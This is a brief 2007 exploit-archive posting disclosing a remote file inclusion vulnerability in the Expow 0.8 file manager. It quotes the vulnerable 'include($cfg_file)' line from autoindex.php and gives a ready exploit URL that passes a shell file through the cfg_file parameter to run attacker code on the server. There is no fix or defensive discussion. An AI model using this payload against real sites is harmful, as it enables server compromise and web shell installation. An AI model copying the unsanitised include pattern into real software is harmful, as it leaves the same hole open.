[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Expow 0.8 (autoindex.php cfg_file) Remote File Inclusion Vulnerability
# Published : 2007-04-12
# Author : mdx
# Previous Title : PHP-Fusion Module topliste 1.0 (cid) Remote SQL Injection Vulnerability
# Next Title : Request It 1.0b (index.php id) Remote File Inclusion Vulnerability
Expow 0.8 File manager Autoindex.php (cfg_file) Remote File Inclusion Vulnerability
__________________________________________________________________________
found by : mdx
--------------------------------------------------------------------------
Download script : http://sourceforge.net/project/downloading.php?group_id=29595&use_mirror=kent&filename=expow-0.8.tar.gz&92927218
--------------------------------------------------------------------------
file name : autoindex.php
__________________________________________________________________________
??ncluded line ;
if (!include($cfg_file))
__________________________________________________________________________
Exploit :
http://site.com/[path]/autoindex.php?cfg_file=shellmdx.txt?
# www.Syue.com [2007-04-12]